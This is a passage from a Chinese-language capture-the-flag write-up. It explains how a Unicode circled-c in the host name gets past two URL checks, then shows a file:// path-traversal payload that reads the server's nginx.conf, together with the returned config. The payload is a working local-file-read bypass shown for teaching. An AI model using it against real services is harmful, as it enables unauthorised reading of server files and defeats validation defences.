因此可以通过版权符号来绕过第一层和第二层的绕过并且又符合 host 名为 suctf.cc 。又因为题目中包含提示 Do you know the nginx 故需要从 nginx 的相关文件中来找 flag ,最后可以在 /usr/local/nginx/conf/nginx.conf 中找到相关信息,Payload 以及回显如下所示。
# url=file://suctf.cⓒ/../../../../../../../../usr/local/nginx/conf/nginx.conf
server {
listen 80;
location / {
try_files $uri @app;
}
location @app {
include uwsgi_params;
uwsgi_pass unix:///tmp/uwsgi.sock;
}
location /static {
alias /app/static;
}
# location /flag {
# alias /usr/fffffflag;
# }
}